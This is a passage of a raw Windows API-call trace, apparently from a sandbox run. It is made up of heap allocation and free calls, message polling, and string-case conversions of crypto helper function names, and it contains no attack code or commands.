(HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.156] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0036.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.156] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0036.156] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0036.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0036.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0036.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0036.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x162af) returned 0x955018 [0036.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0036.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0036.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0036.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0036.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0036.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0036.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0036.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0036.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0036.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0036.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0036.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cee0 [0036.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0036.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0036.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0036.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0036.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0036.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x162af) returned 0x88ffb0 [0036.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0036.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0036.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0036.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0036.160] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0036.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0036.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0036.160] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0036.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0036.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.160] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0036.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.160] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0036.160] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2f8 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0036.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889220 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0036.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0036.161] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0036.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0036.161] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0036.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0036.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0036.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0036.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0036.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0036.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0036.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0036.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0036.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0036.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0036.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0036.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0036.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0036.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0036.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0036.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0036.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0036.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.162] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0036.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0036.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0036.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0036.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0036.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0036.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0036.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0036.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0036.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0036.163] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0036.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0036.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0036.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0036.163] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.163] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0036.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0036.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.164] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0036.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb98 [0036.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.164] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0036.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0036.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0036.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0036.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0036.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0036.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0036.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0036.164] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.164] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0036.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0036.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0036.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0036.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0036.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0036.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0036.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0036.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0036.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0036.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0036.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0036.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0036.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0036.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0036.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0036.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0036.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0036.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0036.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0036.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0036.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) 